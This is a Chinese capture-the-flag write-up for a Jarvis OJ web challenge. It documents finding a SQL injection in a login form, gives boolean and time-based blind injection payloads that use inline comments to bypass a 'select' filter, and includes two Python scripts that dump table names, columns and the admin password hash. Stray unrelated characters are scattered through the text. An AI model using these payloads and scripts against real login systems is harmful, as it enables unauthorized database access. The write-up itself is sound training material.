CTF{s1mpl3_1nJ3ction_very_easy!!}
描述:
很簡單的注入渤刃,大家試試?http://web.jarvisoj.com:32787/
分析:
- 輸入admin和123肥卡,提示密碼錯(cuò)誤溪掀。輸入admin'和123,提示用戶名錯(cuò)誤步鉴。輸入admin'#提示密碼錯(cuò)誤揪胃,輸入username='|| 1#也提示密碼錯(cuò)誤。nice氛琢!確定了注入點(diǎn)喊递!
- 中間走了下彎路走到時(shí)間盲注去了(),做得好慢(主要電腦不行)阳似,我們先來過正常的解題思路骚勘。
基于布爾型SQL盲注,即在SQL注入過程中,應(yīng)用程序僅僅返回True(密碼錯(cuò)誤)和False(用戶名錯(cuò)誤)俏讹。
username='|| ascii(substr(database(),1,1))>1#密碼錯(cuò)誤
username='|| ascii(substr((/*!select*/ database()) ,1,1))>1 #密碼錯(cuò)誤
username='|| ascii(substr((/*!select*/ group_concat(table_name) /*!from*/ information_schema.tables /*!where*/ table_schema=database()),1,1))>1 #密碼錯(cuò)誤
好了可以開始代碼跑了当宴,跑出來表是admin,列是id,username,password泽疆,password值是334cfb59c9d74849801d5acdcfdaadc3户矢,MD5在線解出來是eTAloCrEP……過分了! - 錯(cuò)誤的心路歷程也要走完它殉疼!username='|| sleep(5)#梯浪,發(fā)現(xiàn)是可以睡的
(順便存一個(gè)username=admin'|sleep(10)|',也是可以執(zhí)行的瓢娜。防止下次or被過濾挂洛,多條payload多條路()) !
于是應(yīng)該是基于時(shí)間的盲注了(并不是)眠砾,開始找過濾方式:
username='|| if(2>1,sleep(5),0)#睡
username='|| if(ascii('a')>1,sleep(5),0)#睡
username='|| if(ascii(substring(database(),1,1))>1,sleep(5),0)#是有多能睡()
username='|| if(ascii(substring( (/*!select*/ database() ) ,1,1))>1,sleep(5),0)#發(fā)現(xiàn)過濾了select虏劲,用/!select/繞過
username='|| if(ascii(substring( (/*!select*/ group_concat(table_name) /*!from*/ information_schema.tables /*!where*/ table_schema=database() ) ,1,1))>1,sleep(5),0)#接著把關(guān)鍵詞用/!/繞過
接下來就都來到令人愉悅的寫代碼環(huán)節(jié),兩種一起放一下荠藤,記住手動(dòng)在payload里改data123.
def timeSql():#時(shí)間盲注
import requests,time
s = requests.Session()
url = 'http://web.jarvisoj.com:32787/login.php'
database = ''
for i in range(1,20):
for x in range(32,128):
data1 = 'ascii(substr((/*!select*/ group_concat(table_name) /*!from*/ information_schema.tables /*!where*/ table_schema=database()),%s,1))<= %s'%(i,x)
data2 = 'ascii(substr((/*!select*/ group_concat(column_name) /*!from*/ information_schema.columns /*!where*/ table_schema=database()),%s,1))<=%s'%(i,x) #跑列名
data3 = 'ascii(substr((/*!select*/ group_concat(id,username,password) /*!from*/ admin),%s,1))<=%s'%(i,x) #dump值
payload={'username':"'|| if(%s,sleep(2),0)# "%(data3),'password':''}
#print (chr(x),payload)
t1 = time.time()
result= s.post(url,payload)
if time.time()-t1 > 2:
database += chr(x)
break
print(i,database)
def boolSql():#二分法布爾盲注
import requests
s = requests.Session()
url = 'http://web.jarvisoj.com:32787/login.php'
database = ''
for i in range(1,50):
toe = 31
head = 128
while head >= toe:
mid =(toe + head) // 2
data1 = 'ascii(substr((/*!select*/ group_concat(table_name) /*!from*/ information_schema.tables /*!where*/ table_schema=database()),%s,1))>=%s'%(i,mid) #跑表名
data2 = 'ascii(substr((/*!select*/ group_concat(column_name) /*!from*/ information_schema.columns /*!where*/ table_schema=database()),%s,1))>=%s'%(i,mid) #跑列名
data3 = 'ascii(substr((/*!select*/ group_concat(id,username,password) /*!from*/ admin),%s,1))>=%s'%(i,mid) #dump值
payload={'username':"'|| %s #"%(data3),'password':''}#跑的時(shí)候手動(dòng)改改data123
#print (payload)
result= s.post(url,payload).text.split('<a class="close" data-dismiss="alert">×</a><strong>')[1][:5]
#print(head,toe,mid,result)
if '用戶名錯(cuò)誤' in result:
head = mid
elif head - toe > 1:
toe = mid
else: break
database += chr(mid)
print(i,database)
- 最后輸入admin伙单,eTAloCrEP,登錄拿到flag哈肖。
總結(jié)
- 二分法真的能拯救辣雞電腦吻育!
- 如非必要不要嘗試基于時(shí)間盲注好嗎?又要sleep又不能二分的淤井!答應(yīng)我布疼!
